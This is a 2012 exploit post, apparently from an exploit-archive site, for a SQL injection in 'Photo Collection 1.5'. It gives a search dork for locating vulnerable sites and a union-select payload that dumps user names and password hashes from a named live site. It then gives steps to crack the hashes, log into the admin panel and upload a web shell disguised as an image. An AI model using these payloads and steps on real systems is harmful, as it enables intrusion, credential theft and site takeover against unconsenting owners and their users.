Photo Collection 1.5 SQL Injection

2012.06.13
Credit: Mr.XpR
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:index.php?Blog=*&user_id=

-------------------- IN The NAme OF God -------------------- -====Photo collection Remote Sql Injection Vulnerability====- # Exploit Title: Photo collection Remote Sql Injection Vulnerability # Exploit Author: Mr.XpR # Tested on: BackTrack , 7 , Redhat # Version : 1.5 # MAil : No0pm@yahoo.com -====Dork====- inurl:index.php?Blog=*&user_id= intext: Copyright (c) 2010-2012 by photo collection. All rights reserved! -====Exploit====- http://Site.C0M/index.php?Blog=11&user_id=[Sqli] -====Example====- http://www.dakghor.com/index.php?Blog=11&user_id=-9999+union+select+group_concat%28user_name,0x3a,user_password%29+from+be_users-- -====information====- Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/ Admin Page ~~~~~~~~~> Front PAge With Email And PAssword Login To panel :D Click <<--- Add Profile Picture or Add Picture -----Upload She3ll~~~> Sh3ll.jpg 0r Sh3ll.php.Jpg And Load From http://www.xxxxx.com/images/users/Sh3ll.jpg -====Tnx To====- Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ... And All IraNHAck Security Team Members ~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG

References:

http://www.md5decrypter.co.uk/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top